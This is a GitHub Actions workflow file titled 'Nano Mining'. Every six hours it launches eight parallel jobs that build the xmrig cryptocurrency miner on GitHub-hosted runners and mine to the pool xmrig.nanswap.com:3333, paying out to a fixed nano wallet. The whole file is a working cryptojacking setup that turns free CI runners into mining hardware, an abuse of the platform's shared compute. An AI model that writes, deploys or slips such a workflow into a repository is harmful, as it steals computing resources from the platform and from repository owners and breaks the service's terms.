name: Nano Mining

on:
  schedule:
    - cron: "0 */6 * * *"
  workflow_dispatch:

jobs:
  mining-1:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-2:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-3:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-4:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-5:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-6:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-7:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1

  mining-8:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo content
        uses: actions/checkout@v3

      - name: Install and build dependencies
        run: |
          sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Mining
        run: |
          cd xmrig/build
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_336mbragfzrsxi14jig4nmqzhfmyzhambrgxnaxa6ebj7pgh7q9t8ndfci6t -p x --randomx-mode=fast --donate-level=1